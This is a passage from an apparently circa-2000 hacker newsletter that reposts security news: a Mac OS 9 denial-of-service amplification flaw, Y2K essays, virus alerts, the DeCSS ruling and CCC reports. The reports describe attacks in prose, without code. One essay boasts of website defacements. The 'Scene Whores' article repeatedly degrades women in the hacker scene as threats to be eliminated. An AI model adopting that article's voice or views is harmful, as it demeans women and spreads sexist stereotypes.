for computers running Mac OS 9; these Macs can then be sent a small (29-byte) packet of data, which Mac OS 9 replies to with a 1,500-byte datagram. "This appears to be the way Mac OS 9 explores an Internet route," Copeland said. Attackers can then send "trigger datagrams" with a false source address (that of their target) to a large number of Mac OS 9 computers. If these triggers are sent in rapid succession, Copeland said, the "amplified" responses can overwhelm the target's Internet connection, denying service to that target. Although DOS attacks are a fact of life on the Internet, "it's much harder to stop a distributed attack," Copeland said, because the sources of the attack aren't even aware of their part in it, even as it occurs. Prior to Apple's (Nasdaq: AAPL) release of the patch, the only sure defense against this exploit was for users to turn off or disconnect their Internet connection, Copeland said. "I've seen scans of this nature but no attacks yet," said Copeland, who posted online warnings of this type of DOS attack on New Year's Eve. However, Copeland told MacWEEK his warnings are "pure speculation." -=- Net attacks could come through latest Apple system By Jim Davis Staff Writer, CNET News.com December 29, 1999, 11:45 a.m. PT update Computers with the newest version of Apple's Macintosh operating system software could be used as unwitting aides to the latest fad in Internet attacks, according to a new report. Customers who have installed Mac OS 9 are susceptible to being used in "denial of service" attacks from malicious programmers if their computer is hooked up to the Internet via "always on" digital subscriber line (DSL) or cable modem connections. The computer expert who discovered the flaw said that it does not appear that Mac computers themselves are being shut down by attacks, but that they merely are capable of being used as pawns to harm other computers. Dr. John Copeland, who chairs the Georgia Institute of Technology's School of Electrical and Computer Engineering, said the correction for the flaw needs to be applied before New Year's Eve in order to prevent the Macs from being used to attack other computers. As previously reported by CNET News.com, security experts have warned of a possible concerted effort to attack computers on New Year's Eve. Apple has already issued a fix for the problem at its Web site. Carnegie Mellon University's Computer Emergency Response Team (CERT) said in an advisory note that "Intruders can flood networks with overwhelming amounts of traffic or cause machines to crash or otherwise become unstable." It does not appear that any computers have yet to be used in such attacks; CERT merely reported that such an attack was possible. Cupertino, Calif.-based Apple said in a posted reply to the CERT team: "We've reproduced the problem in our labs. The problem only affects customers running our most recent release of networking software on machines that are continuously attached to the Internet." "Apple is aware of the CERT advisory and has taken steps to address it," confirmed an Apple spokesman. "While we believe the potential risks to our customers is extremely small, we have worked quickly to provide the latest and most secure software to Mac users," he said. In addition to being able to download the fix and installing the software themselves, Mac OS 9 is capable of automatically updating itself with this fix as it becomes available later on specialized Apple servers, but only when the feature is enabled by the user. Most Macintosh customers are not affected by this problem, Apple said. Denial of service attacks aren't new, but there has been a sudden surge in them. Recently, two new families of attacking programs, called the "Tribe Flood Network" and "Trinoo" were identified by experts. Computer experts believe that some attacks are timed to go off when the century turns. Generally, denial of service attacks work like this: An attacker secretly embeds software into hundreds of unwitting computers. Then, at a selected time, a command is issued that prompts the infected computers to swamp a target Web site or server with messages in a method of attack called "denial of service." The program doesn't damage the "infected" carrier computers or the target, but the sudden flood of messages typically knocks out the target system. The flaw in the Apple networking software, called Open Transport, could allow an outsider to use a targeted Mac computer as a carrier. Although it's possible for target computers to protect themselves from denial-of-service attacks by ignoring messages, it's hard to identify which computers are attacking them--especially when there are hundreds. This fundamental vulnerability of networked computers makes protecting against denial-of-service attacks extremely difficult. A study released earlier this year reported that computer security breaches were up 16 percent from 1996 to 1997, and that computer-related crime, including security breaches, had cost 241 surveyed organizations $136 million last year. Users of Macintosh computers, in general, have had fewer security issues to deal with over the last few years, in part because there were simply more Windows-based computers to target. But the system itself isn't impervious to the usual array of viruses and other security issues--and neither is the software that runs on it. Last week, for instance, Microsoft said it resolved a potentially troublesome security problem that would have affected online shoppers using the Macintosh version of Internet Explorer. The company issued software that fixes a glitch in the IE 4.5 Web browser which may have made shopping via the Net a risky proposition if not fixed before Jan. 1, 2000. The new Mac OS 9 security issue was first reported at the Macweek Web site. @HWA 32.0 The need for physical security - Securing the OpenBSD console 12/29/99 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by grant A white paper from 2600 Australia has been released that covers the need for and reasoning behind physical security of both the console and storage devices of a particular computer and some distilled advice from the misc@openbsd.org mailing list on ways in which the OpenBSD console might be secured from unpassworded physical access. 2600 Australia http://www.2600.org.au/openbsd-console.html @HWA 33.0 New Era: Buffer Overflow Article by evenprime 01/03/00 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ A buffer overflow original article. contributed by evenprime Y2K has come and gone and left most people pretty much unscathed. The massive effort to clean up messy code over the last few years looks like it has paid off. What can be learned from this? How can this be applied to writing secure software for the coming millennium? This new article in the Buffer Overflow section examines these questions. Buffer Overflow http://www.hackernews.com/bufferoverflow/index.html A New Era Written By: evenprime It is customary to do some reflection this time of year, and I've been doing a little thinking about Y2K. I suppose that makes sense, since it was the part of computing that got the most media coverage the past year. It looks like the date change caused very few problems, and most of those were extremely minor. Still, there are lessons that can be learned from the things that did happen. It took a lot of time, effort and money to ensure that the date change was uneventful. One thing to learn from Y2K is that it is difficult to fix a program after it is developed and implemented. Getting all the bugs out of a piece of software that's currently in production usually requires having an outside set of eyes look at the code, as the Social Security Administration recently found out. The application of this principle to the open source movement is evident [1], but even closed source developers can benefit by having their work audited by someone outside the development team, or better yet, outside the company. The DVD Copy Control Association have amply demonstrated the dangers [2] of trying to locate your own design flaws instead of letting someone else examine your work. Look back at how programming has been done, and at what it has achieved. Date related bugs were everywhere, and had to be fixed. Security bugs are still everywhere. Unchecked input to static buffers, race conditions, and programs that are installed with too many privilege are all around us. All these things come from the same source: a method of software development that focuses on immediate results. It seems like the only concern most developers have is that the program they write works today, in our current network environment, with the input they expect it to receive. That's a flawed way to look at software use. Y2K has taught us that the things we write will be used far longer than we expect. Users ensure that our programs will receive input that is not what we anticipated. [3] This may be true even if our intended users are not looking for bugs. :) I once wrote a user management script that, due to not checking operator input, was capable of preventing the entire user population from getting to applications necessary for their jobs. A beginner's mistake, but one that showed me how important it is to design programs so that they fail gracefully. The software problems we have are not new. Lions wrote about race conditions back in 1977 [4]. Dr. Mudge was writing about buffer overflows back in 1995. [5] Where has this gotten us? Last week bugtraq readers were informed of a root compromise via a race condition, and there were six security-related buffer overflows. There are tools [6] and techniques [7] out there to assist in secure programming, but very few people use them, so we keep seeing the same types of mistakes. Politicians have noticed the net, and they tend to think it is fairly important stuff. They have been tossing around terms like "Information Super-highway". Presidential Directives [8] have declared computer networks to be part of "America's Critical Infrastructure". The FBI has set up the National Infrastructure Protection Center to guard our networks. Infrastructures are things that are built to last, and when people begin comparing our computer programs to them, we ought consider the assumptions being made by the users. The highway analogy is kind of interesting; the engineers responsible for highways add saftey berms and guard rails to their designs, and they don't run the roads over quicksand. They try to incorporate safety into the design while it is still in the planning stages. If the rest of the world thinks that we are designing an infrastructure, this industry needs to step back and look at what it is doing. Y2K has taught us that we may be using today's programs for a long, long time, so perhaps we should begin to develop with a different emphasis. This is a good time to consider abandoning the "functionality first" way of doing things and adopting a "durability first" mind set. After all, a new millennium seems like a good time to begin a new era of software developemnet. 1. "Open source keeps designers honest. By depriving them of the crutch of obscurity, it forces them towards using methods that are provably secure not only against known attacks but against all possible attacks by an intruder with full knowledge of the system and its source code. This is real security, the kind cryptographers and other professional paranoids respect." - ESR http://www.tuxedo.org/~esr/writings/quake-cheats.html http://www.tuxedo.org/~esr/writings/ cathedral-bazaar/cathedral-bazaar.html 2. "The lesson: This is yet another example of an industry meeting in secret and designing a proprietary encryption algorithm and protocol that ends up being embarrassingly weak. I never understand why people don't use open, published, trusted encryption algorithms and protocols. They're always better." - Bruce Schneier http://www.counterpane.com/crypto-gram-9911.html #DVDEncryptionBroken 3. "Security engineering involves making sure things do not fail in the presence of an intelligent and malicious adversary who forces faults at precisely the worst time and in precisely the worst way." - Bruce Schneier http://www.counterpane.com/crypto-gram-9911.html #WhyComputersareInsecure 4. The code for "swap has a number of interesting features. In particular it displays in microcosm the problems of race conditions when several processes are running together....What happens next depends on the order in which process A and process B are reactivated. (Since they both have the same priority, "PSWP", it is a toss-up which goes first.) Lions, J., 1977. p. 15-2, "A commentary on the UNIX operating system" 5. http://vapid.dhs.org/Library/bufferov.html 6. http://www.l0pht.com/slint.html 7. http://www.unixpower.org/security/ 8. http://www.fas.org/irp/offdocs/pdd/index.html (#62 & #63) @HWA 34.0 Gangly Mentality, the Y2K hype by ytcracker 01/03/00 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ A buffer overflow HNN original article. Gangly Mentality The story of the great Y2K swindle and what is to come. by YTCracker(phed@felons.org) The Setup What do billions of dollars, billions of useless books, and billions of prophetic statements have in common? If you guessed the infamous Y2K rollover, you are probably one of the millions of people who were informed of some global catastrophe set to take place the first of this year. There was not a paper in publication these last few years that didn't mention some sort of doomsday consequence related to our society's dependancy on computers. If you are any kind of normal human being you would have expected something interesting out of this entire fiasco. I expected something self-fulfilling. Mobs of fanatics and drunks taking to the streets with automatic weapons shouting verses out of the Bible, siphoning gas and stealing stereo equipment. The most eventful happenings in Denver and Colorado Springs were a few kids begging the cops to beat them. It was worse than that when the Broncos won the Super Bowl. Digitally, I was surprised to see the overall lack of systems compromised. I expected Attrition to be flooded up to their necks in defacements. The staff had informed me that they were planning on keeping a pretty good monitor on things. Their major concern was cross-continental defacements that represented some anti-government motives. Sadly, there was no largescale cyber-shootout. All was quiet in the land of the double-oh. However, I don't think that we are out of the clear yet. A few issues still need to be addressed. Just because the infamous "Millenium Bug" turned out to be a farce[in a general sense] does not constitute a sigh of relief. Every threat that took place before the rollover is just as real. Every security issue unaddressed prior to the first is still something to reckon with. I would argue that we have introduced a whole breed of new problems that have absolutely nothing to do with something so trivial as a system date. The History There was a time when the Internet was occupied by a select few. In order to participate you required a little more than standard knowledge of a computer. If you didn't have some kind of dialup account provided by your employer you were forced to shell out a great deal of money for a meager ten hours. This regulation provided a positive future for the Internet; a handful of knowledgeable people were constructing the fabric of the system while another handful of knowledgeable people were engaging in mastering it. The only browser that anyone used was NCSA Mosaic. Any application you used was from the Trumpet Software suite. All the files you ever wanted you obtained from Walnut Creek or the Washington Archives. This environment led to quick growth and a plethora of new frontiers. In recent times, manufacturers have made it incredibly easy to hop on the bandwagon and begin anew through your phone line. Granted, this is a great thing. The Internet is probably the single greatest invention of the twentieth century. It possesses an endless wealth of knowledge and power at your fingertips. These extremely positive qualities make it very hard to believe that there is a downside. An obvious issue is this recent obsession with the New Year. If another Melissa virus or Y2K-ish event emerges the media will overexpose it beyond its true threat. Many elements play into this exposure ranging from computers rapidly becoming a part of everyone's life to a reporter's burning urge to write a great story. What can we attribute this obsession to? Ignorance. As aforementioned, the Internet is no longer occupied by a majority of intelligent and computer-literate individuals. It is very simple to just hop online as a casual user and be taken advantage of. It is also easy for a fairly casual user to land a job in charge of the systems that govern your use of the Internet. Entrusting this kind of information into incapable hands is unnerving but it happens everyday. Bad people are out there, you know. The Dilemma We now have an equation that doesn't balance out. We have an extremely disproportioned Internet community that consists of ignorant masses that can be led by simple fear and heresy. On the other side of the fence we have that original handful[sizewise], some of which are running around like vigilantes for the good of the gangsters. The other piece of that pie is looking to ruin your life, take your credit card information, and load countless virii on your computer. It is very doubtful that something like this will happen to everyone[this is an extreme scenario], but you get the point. The broadcast ability that the Internet provides is a potential tool to instigate a nationwide scare. Imagine if a malicious user was to spam an authentic looking hoax proclaiming that a new generation of virus has infested itself in United States' vital computer systems and another country is extorting us. "By the way, I work for the Department of Energy. I'm not supposed to be releasing this. I am jeopardizing my job for the greater good here." It may be a little farfetched, however it's the principle that is important. Due to the media potentially telling an event such as this to the public with spokespeople "refusing to comment," we usher in an age where a simple rumor can affect an entire country in a very negative manner. Further banking off of the ignorance of the online community, people have authored worms cleverly disguised that are zipping around the world as you read this. The media tends to focus more on a scare tactic than an educative standpoint. This take on such events only breeds more ignorance and it discourages people from the truth of the matter. It is my fear that if you were to take a general poll of the streets asking fairly straightforward questions about the topics in this article you would get some pretty weird looks on people's faces. They would probably also tell you that they think "hackers" are the root of all evil and that they don't know much about the culture except that they "use viruses" and "fuck with people." Who is to blame? The Coverup One of the biggest misunderstandings of the general public is what really goes on behind the scenes. I will be the first to admit that the defacements that I have contributed to required little or no skill. While I may have capitalized on an existing vulnerability, the root of the problem is the same. You can code in as many languages as you want or be a total newbie and it is still just as easy to manipulate these vulnerabilities. If the general public knew how simple it was to actually compromise a server[excluding the hours/days/weeks to code and conceptualize, but to dotslash-hax0r], they would have a fit! Even more discouraging is the fact that such high profile sites fall victim to these attacks. This is what is depressing. Our so-called security experts have fallen to mere children fooling around after school. As regular Hackernews readers are probably informed, the state of the Internet is slowly deteriorating into a free-for-all. Which brings me to my next point, cyberterrorism. Most officials will attest that the United States is ready to defend against such attacks. However, at the current rate of growth concerning infrastructures and software chalking up the version numbers, staying on top of things these days is virtually impossible. A chain is only as strong as its weakest link, and I'll be damned if those webservers weren't some mighty weak links. Even though the majority of classified information is maintained through a SneakerNet[Nike or Reebok version 2.2 and higher], there are careless individuals who will leave sensitive data for the taking. The End Generally, people don't have much to fear. The army of computer-impaired will eventually find some way to evolve. I personally propose some sort of mandatory education concerning surfing practice and what exactly that big box that makes "clickity" noises really does. Perhaps then people will be a little more mature when their mouse disappears. On the other hand, the governments of the world are frantically running around trying to save face. Reason? They don't want to be left behind. They know as well as we do that there are plenty more problems where the "Y2K Bug" came from. They are the ones that are going to be in charge of mediating the situations as they arise. Time to panic? Not yet. Wait until 2028 when the seven-bit date blows[2^7=128]. Until then have a happy 19100. YTCracker(phed@felons.org) (c)2000 YTCracker and sevenonenine @HWA 35.0 "Scene Whores" By Eric Parker/Mind Security 01/03/00 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ A buffer overflow HNN original article. A well known, but overlooked threat to Hackers. Scene Whores. By: Erik Parker Mind Security Let me start off with a quick preface to give some explanation as to why I am writing this. First, this is going to seem like a very sexist article, as I will always refer to woman as the scene whores, and use 'she' when speaking about scene whores. The reasoning behind this is, the majority of hackers are men. I did not go out and take a poll or anything, but I feel very safe in saying the majority of hackers are male. This paper may use examples that you might feel were written about you, or your situation, but the reason it seems like this, is because most confrontations with scene whores, are very much alike. I wanted to take Lance Spitzners Papers on "Known your Enemy" and reword them to apply here, as script kiddie and scene whores are very much alike, they just use different common tools. Now I know what you are thinking, that this article must be a joke, or that I must be writing it out of anger because of something that has happened to me. Well yes I have first hand knowledge of the Scene whores, however I haven't been directly involved with one for a couple of years. This is spawning off of watching other relationships, and seeing many scene whores come and go, that have their reasons. If I had to speculate on why they do it, I would say a majority of them don't realize they are, that it is something in their sub-conscience making them do it. Whether it is for popularity in the "scene", or they think they will learn more by sleeping their way up the hacker ladder. This article is not a joke. They are a real threat. They waste our time, ruin friendships, cause chaos between hackers, and generally ruin periods of our life. A sure sign after being compromised by a scene whore, after they are are done with you, is when you go to talk to friends you have neglected during the period of compromise, and they say "Welcome back, we missed you". However, what has to be figured out, is how to make there never be a period of time like that. Scene whores can be found in several places. I think a very common one is on IRC. Other places like 2600 meetings, Conventions (Like Defcon), and even meet them through your friends, who may have met them in the above mentioned ways. Some very unlucky guys get scene whores right from the start, when they first turn into it. The scene whore has decided that Hackers look glamorous, or they find out how large your salary is, compared to hers, her current boyfriends, or even her parents combined. We are a rare species I suppose, we are in an age where we wear what we want, we don't necessarily need a college background, we are making 6 digit figures, and setting the rules for our selves. Anyway you look at it, scene whores can look and think that we have power, money, and we are the stereo typed "cool". Some of us are all of the above, and into drugs, and many girls find drugs to be an attractive feature. I don't have a lot of experience with scene whores and drug related things, as I went a different direction and stayed away from most of the drug scene. There is a very classic approach that is seen in most cases. This is an easy one to see coming, if you do a little history research about the possible scene whore before you get involved. The Ladder approach is what I like to call it. In most cases when dealing with a ladder, you start at the bottom and work your way up. Just like the scene whore does. They try to get networked into the scene by finding someone who knows something, or at the very least, knows someone who knows something. If they are good looking, or partially good looking and easy, they have no problems with this approach. There is one good thing to say about the majority, most of them learn something on the way. If nothing else, they usually learn what the internet is, how to IRC, how to login to NT, and maybe even how to work IRC under a non-windows platform. They will go with bottom rung hacker for a little while, and then once the scene whore has met enough of the hackers friends, or actually gets to be known a little bit, and meets a few people on their own, they find someone more interesting.. Someone who seems smarter, and has more friends, or has been in the media more, or has some noted accomplishments. Usually this person is a friend, or acquaintance of the first hacker. They move on, and this usually destroys the friend with the new target, and the old target, as well as with the scene whore, and the old target. One term scene whores should learn is, be nice to hackers on your way up, because you will be seeing them again on your way up again. Hopefully we can start identifying scene whores quicker, and securing ourselves against them quicker, and put them out of commission. In the above mentioned method, scene whores can make it up just a few guys, or make it along dozens of people. You can get a good idea of how many people scene whores sleep with by reading the Hacker Sex Chart. You will notice some scene whores with a dozen or more links on there. You will notice some very well known people on that list, and notice even they got sucked into the claws of a scene whore before. Scene whores who sleep around, and think that sex will gain them knowledge find out in the end that they are just worthless whores who had a good time, and probably picked up more diseases than knowledge. There are other methods.. Or lack thereof, that scene whores use. Some are not in it just to get to the top. Some are in it, just to meet as many people as they can, and have as much "fun" as they can. These are Good looking scene whores, to the nastiest of scene whores. There is always a hacker, or a perhaps a drunk hacker, that will do the nastiest of scene whore. These ones are even worse than the Ladder Climbers, as they usually tend to sleep with more people, have less commitments. Well, this depends. They aren't as bad as the ladder climbers in the way that they don't consume as much of the hackers precious time, and usually don't make people leave their friends. These girls do however tend to breakup more friendships than the ladder climbers, as they cover more ground. The friendships that were strong usually get repaired though, as they quickly realize she was a scene whore. These scene whores are usually detected a lot quicker than others. Then there are the extremely ignorant scene whores. The ones that make the other types look intelligent. These are the ones who watched the movie 'Hackers', and have only heard about the criminal side of hackers. They want to get into it for the feel of doing something bad. Thinking they will find a group of hackers that can get them millions from a bank, or do something so illegal that it turns them on. You know the types, the types of people who get excited at the thought of doing something naughty. Like having sex in a church during Sunday morning gatherings. These scene whores usually only end up finding stupid web site defacers, who introduce them selves as hackers, when they are really mistaken, and are just script kiddies and crackers. Sometimes these hackers actually do something illegal, and the scene whore finds it very erotic and loves it. A few weeks later the Cracker is arrested, and the scene whore testifies against them, and the cracker gets fined, spends time in jail, or ends up without their computer for years. Now the hard part is.. To determine which ones aren't scene whores. The ones who have been with other hackers, but are true and honest, and like you for who you are. I can't say the best way to determine this. I think it is easier to just try and detect the scene whores, and eliminate them, than to try and find a way to detect non-scene whores, if that makes any sense to you. There are cases where the non-scene whore had legitimate relationships with other hackers, and it just happens that you are the right person for them. The fact that you are a hacker has nothing to do with it. They aren't out for your money, for your friends, to be in the news papers, or to see you commit crimes on computers. There is a possibility I am looking at this all wrong, and of course most of this is based off of what I have seen, my thoughts and opinions. There are hackers who like scene whores, because they know it won't last, but it is like an adventure. However the hackers who like the scene whores usually leave time for their friends, and don't get swallowed up by them. However, these hackers help contribute to keeping scene whores around, and eventually the scene whores they let stick around, will end up ruining some other hackers life, or a period of it anyway. Last, I contemplated doing this article for some time. It is a controversial subject, especially because of what I mentioned in the preface, that it seems biased against woman, and that it generally applies to them, and because of the number of men Vs. the number of woman that are real hackers, and because I have never seen a guy go around and sleep with as many hacker woman as he could, I can't really put the article into that perspective. On another note, just to reiterate what I said in the start, this article is not about you, or anyone you know. It is not about anyone period. It is about the concept of scene whores, why they do it. I would have added in on how to stop them, but the only way to stop them is to identify them, and to control yourself. Think with your head, and not any other part of you. As well, if you do happen to get in with one, get health insurance, because it could do serious damage to your heart. Thanks to the Proof Readers: Anonymous xs @HWA 36.0 DVD Control Association Looses First Round 01/03/00 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Weld Pond Santa Clara County Superior Court Judge William Elfving has denied the DVD Copy Control Association's request for a restraining order against numerous web sites and individuals. The DVD CCA had hoped that the restraining order would prevent people from distributing DeCSS a program written to allow the playing of DVD movies on regular computers and not DVD players. While the restraining order was denied the war is not over yet. Trial has been scheduled for January 14, 2000. The EFF provided preliminary legal assistance in this case. Associated Press - via Yahoo http://dailynews.yahoo.com/h/ap/19991229/tc/dvd_copying_suit_3.html Industry Standard - via Yahoo http://dailynews.yahoo.com/h/is/19991229/bs/19991229242.html Electronic Defense Foundation http://www.eff.org/ HNN's copy of the legal complaint http://www.hackernews.com/special/1999/dvdinjunction.html DeCSS Defense Site http://www.lemuria.org/DeCSS/ DVD Copy Control Association http://www.dvdcca.org/dvdcca/index.html @HWA 37.0 First Viruses of the New Year Discovered 01/03/00 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by The Ringo and turtlex Computer Associates has announced the discovery of the first new virus/trojans of the new year. While some of the four pieces of code that have been discovered do contain destructive payloads none of the four are considered extremely dangerous. (Four? That's it? Where are the predicted 30,000 Y2K viruses?) ZD Net http://www.zdnet.com/zdnn/stories/news/0,4586,2415783,00.html?chkpt=zdhpnews01 Reuters - via Yahoo http://dailynews.yahoo.com/h/nm/19991231/tc/yk_computerassociates_1.html Say hello to Feliz.Trojan and Armagidon CA spends weekend publicizing low-grade viruses. The latest two pack some punch, but appear little more virulent than WScript.Kak, Trojan.Kill. By Robert Lemos, ZDNet News UPDATED January 2, 2000 2:48 PM PT It's already been a busy new year for virus watchers at Computer Associates International Inc., which used the weekend to issue the first virus warnings of the year 2000. CA (NYSE: CA) followed up two earlier warnings with two more on Sunday, issuing releases warning of Feliz.Trojan and Armagidon, a new Word macro virus. Both are potentially destructive. Feliz.Trojan can cause PCs not to boot, and Armagidon can cause documents to print with incorrect characters. Armagidon will also replace the Windows mouse pointer with a Red Cross symbol on May 8, which is Red Cross Day. CA officials were not immediately available to assess the potential virulence of these new viruses. There was no mention of them on other virus sites. The other viruses CA issued warnings of were not considered very dangerous. On Saturday, CA released an alert that warned users of Wscript.Kak, a worm that spreads via systems that use both Microsoft Windows 98 and the Microsoft Outlook Express 5.0 e-mail client. A company official acknowledged that Wscript.Kak was not particularly virulent. "From a risk perspective, this is fairly low. You have to send an e-mail for it to spread," said Simon Perry, security business manager at CA in an interview with ZDNN on Saturday. "A self-propagating virus, like Melissa, will spread itself to several others automatically, and by the nature of the propagation you get a threat." While the Melissa macro virus, which struck thousands of companies last March, required the user to open an attachment, once that had occurred the virus spread exponentially. Like Melissa, Wscript.Kak does not appear to do any damage to systems, but merely spreads itself by attaching a copy of the virus onto every e-mail that a user sends. That makes it a potential nuisance, at worst. The systems of corporate and home users that have turned off scripting -- a recommended strategy after the appearance of BubbleBoy two months ago -- will not be infected. "Though this virus isn't Y2K-related, its discovery further confirms that hackers will exploit fears throughout the Y2K changeover," Perry had said in a press release issued Saturday. The statement seemed somewhat ironic, since the lack of a malicious payload or any mention of it by other anti-virus firms suggested that CA itself is capitalizing on those fears. Perry told ZDNN that a CA client found the worm, so that even though the virus has been classified as "low risk," the company believed publicizing it was the best course. Has potential to spread One aspect of the worm that could lead to its spreading quickly is that users don't have to click on an attachment to trigger the malicious code. If a user's Internet Explorer security settings are set to low or medium, the worm will infect the system without any user action, said the company. The worm will then go on to change the signature settings of the user's mail to its own and then attach itself to every e-mail message the user subsequently sends. Users who have the Windows Scripting Host option turned off will not be susceptible to this, or any, scripting virus. After infecting the computer, the worm will shut down Windows. After the system reboots, the worm will be running in the background, waiting to infect every e-mail the user sends out. Otherwise, CA doesn't report any malicious payload in the virus. Trojan.Kill more destructive Earlier this week, CA reported another virus distributed through pirated copies of Windows 98 operating systems. The virus, known as Trojan.Kill, could wipe out information saved on computers when their dates roll past Jan. 1. "Since Trojan.Kill is directly related to Y2K and carries a destructive payload, we're concerned about the damage it can do," said Perry. "Obviously this virus is specifically targeted at illegal software, and Computer Associates strongly recommends that all software deployed either in the business environment or for home use is a legal copy," Perry said in a statement. pread through traditional means such as e-mail, shared drives or floppy disks, Trojan.Kill hides behind a setup file called "Instalar.exe." Reuters contributed to this report. -=- Reuters: Friday December 31 7:34 PM ET Computer Associates Warns of New Viruses NEW YORK (Reuters) - Computer Associates International Inc. Friday warned of several computer viruses the company said were part of string of viruses timed to take advantage of fears about the changeover to the Year 2000. The Lucky 2000 virus, which runs on Microsoft Windows 95, 98 and NT platforms, infects files that use the Visual Basic programming language, Computer Associates said. The virus wipes out the content of the file but does not change the name so a user will not know a file has been infected until it is run. Lucky 2000 sends users to a Russian Web site when they try to run infected files. The company also warned about the Esmeralda.807 virus, which causes a delay when a user opens a 32-bit Windows file, making it appear that the computer has temporarily frozen. The Spaces.1633 virus harms the start-up function of the computer. A separate virus, called Zelu.Trojan, has the potential to destroy all files on an infected machine while pretending to be the antidote to a Y2K bug. It arrives as an executable with the name Y2K.EXE. ``All computer users must take extra precautions during this virus onslaught,'' said Simon Perry, business manager of security at Computer Associates. ``We can't stress enough the importance of powerful and reliable antivirus software as virus writers continue to exploit user fears on the eve of Y2K.'' Computer Associates said further virus-related information is available at http://www.cai.com/virusinfo, and it said it is offering free downloads of antivirus software for personal use at http://antivirus.cai.com. The company provides software, support and integration services, mostly to businesses, Shares of Computer Associates closed down 7/16 at 69-15/16 on Friday on the New York Stock Exchange. @HWA 38.0 Reports from Chaos Computer Congress 01/03/00 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by evenprime Steve Kettmann reports from Germany for Wired on the 16th annual Chaos Communication Congress. (There isn't much new in these reports if you have ever been to any con before.) Wired - CCC Women Were Odd Men Out http://www.wired.com/news/culture/0,1284,33346,00.html Wired - Oh, How the CCC Has Evolved http://www.wired.com/news/culture/0,1284,33342,00.html CCC Women Were Odd Men Out by Steve Kettmann 9:35 a.m. 30.Dec.1999 PST BERLIN -- There was a lot of talk about family and community at this year's Chaos Computer Club annual congress. But a lot of women were wondering: Whose family? To call Chaos male-dominated is a vast understatement. And that didn't go down too well in some quarters. To mollify the women who were there, they were promised a "hack center" of their own. But the hordes of pasty-faced teens with monitors under their arms needed space, and they took over the room. An open confrontation ensued. "Some of them said they didn't think a women's room was necessary," said Nina Corda, an ISP hotline worker from Bremen who was a key organizer of the women's room. "They said, 'Just because you're a woman doesn't mean you get special treatment.'" Corda, a smiling woman who speaks fondly of her days street-fighting against neo-Nazis, was not about to sit still for that sort of talk. "We are marginalized in the CCC," she said. "Just take a look around." Corda appealed to the CCC leadership. The top logistical organizer for the conference, Tim Pritlove, finally relented and transformed it back to a women's room. Several women-only workshops were held, including one on Linux instruction in which about 25 attended. It was a victory in the sense that even though women comprised only about 10 percent of the total attendance, they still were a presence. "When I asked Tim, he said it didn't look like we were doing anything in the room, because we had only set up one computer," Corda said. "I said, 'Hacking isn't only about computers. It's a state of mind.' Technically, I'm not the strongest. For me it's more a political thing. "Hacking to me is about always wanting to know more, and not thinking that you already know it all." As a sort of compromise, this year's women room was not called a "women's room" but a "know-it-all free zone." "They were not that rare and exotic as last year, but it's still a small group," said CCC spokesman Andy Mueller-Maguhn. "I wouldn't say it's a problem. What's remarkable is not so much the number of women but their handling of computers and their handling of the situation. In my point of view, the women are starting to get really cool and really tough. They have a status of self-consciousness which is really remarkable. They say very loud and clear what they want." Interviews with women at the congress revealed a split. One group favored a more combative demand for inclusion. Another group believed more in jumping right in and making a longer-term bid for influence. "We will take over within 10 years," joked Nika Bertram, a member of the Kologne CCC. "You have to do things on your own," she said. "What cyber-feminism wants is to find its own way, and then talk to the men, and not hear, 'Your way is not the right way.' Maybe it's better not to have men telling you how to do things.' But it's actually a very open scene. The boys are very nice. We like them. No one ever said, 'There is the coffee machine.'" Kologne CCC member Christine Ketzer, who helped lead a workshop titled "Big Brother Is Watching," agrees. "Some women aren't interested in technology for technology," she said. "They are more interested in the social angle. It's really important for women to make themselves visible in the scene. It's very important to talk about the real serious topics and to become network administrators and things like that." Ketzer and Bertram both thought that the women they knew in the scene tended to shy away from speaking out and making their presence felt. Mueller-Maguhn made much the same point in explaining why more women were not scheduled to lead workshops. "Back in November, I sent out emails asking everyone who they wanted to hear, and there were no suggestions like that," he said. "I think it has to do with presenting yourself, and that is more of a man's domain." It was all disturbingly familiar to Rena Tangens and Barbara Thoens, the most famous women CCC veterans. Tangens attended her first CCC congress in 1988. "I was shocked," she said. "I was the only woman there. Well, there was one other woman there, but she was making cake. I decided I had to do the job myself. I led a workshop the next year on finding the advantages of different approaches to computers." Thoens soon joined in, and in the mid-90s served a two-year term as CCC president. The two women made a video making sport of how men explain technology. "They say, 'Let me do it,'" Thoens said, and both women laughed. But this year's fight over a women's room, one they thought they had settled years ago, left both feeling sad. "It's not fair," Tangens said. "It's just looking at the male view and ignoring everything else." Added Thoens: "The way of communicating between men is very loud and noisy, especially in the Berlin CCC. I like that, but some women don't. The men say the women have to shout, too, if they want to be heard. I always try to explain our concept and the men don't understand. I tell them 'It's good for you if there are a lot of women.' But the Berlin group would be happy if it was all men, just so long as you're seriously interested. "I think next year it will be really difficult again organizing the women's room." -=- Wired #2: Oh how CCC has evolved Oh, How the CCC Has Evolved by Steve Kettmann 9:35 a.m. 30.Dec.1999 PST BERLIN -- It says everything about how the Chaos Computer Club has evolved over its 16 years that Internet access kept disappearing at this week's annual congress, and the main reaction was easy-going jokes. The three-day congress was held in an old East Berlin official building called the Haus am Köllnischen Park, the former training school for East German party members. Technical limitations prompted CCC techies to opt for Web access via a radio hookup, and the results were repeated, hours-long interruptions. "The times the Internet doesn't work, we have more people in the workshops," CCC spokesman Frank Riegr observed. If it seems like there is no such thing as hacking without an Internet connection, well, time to update. To many at the congress, "hacking" meant anything from thinking creatively to questioning authority to getting a buzz going. The hacker persona has changed a lot since 1984, when CCC co-founder Steffen Wernery was organizing the first annual congress. "It was illegal to have a modem," he said. "You looked like a criminal if you had a computer and a phone connection. Now every computer has that." 